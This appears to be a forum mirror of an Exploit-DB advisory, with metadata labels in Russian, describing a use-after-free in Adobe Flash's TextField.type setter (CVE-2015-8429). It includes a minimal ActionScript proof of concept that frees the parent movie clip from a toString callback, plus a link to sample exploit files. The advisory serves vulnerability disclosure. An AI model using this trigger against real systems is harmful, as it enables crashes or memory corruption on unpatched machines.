- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39052
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2015-8429
- Дата публикации
- 2015-12-18
Adobe Flash TextField.type Setter - Use-After-Free
Код:
Source: https://code.google.com/p/google-security-research/issues/detail?id=577
There is a use-after-free in the TextField.type setter. If the type the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.type = {toString : func};
function func(){
mc.removeMovieClip();
// Fix heap here
return "input";
}
A sample swf and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39052.zip- Источник
- www.exploit-db.com
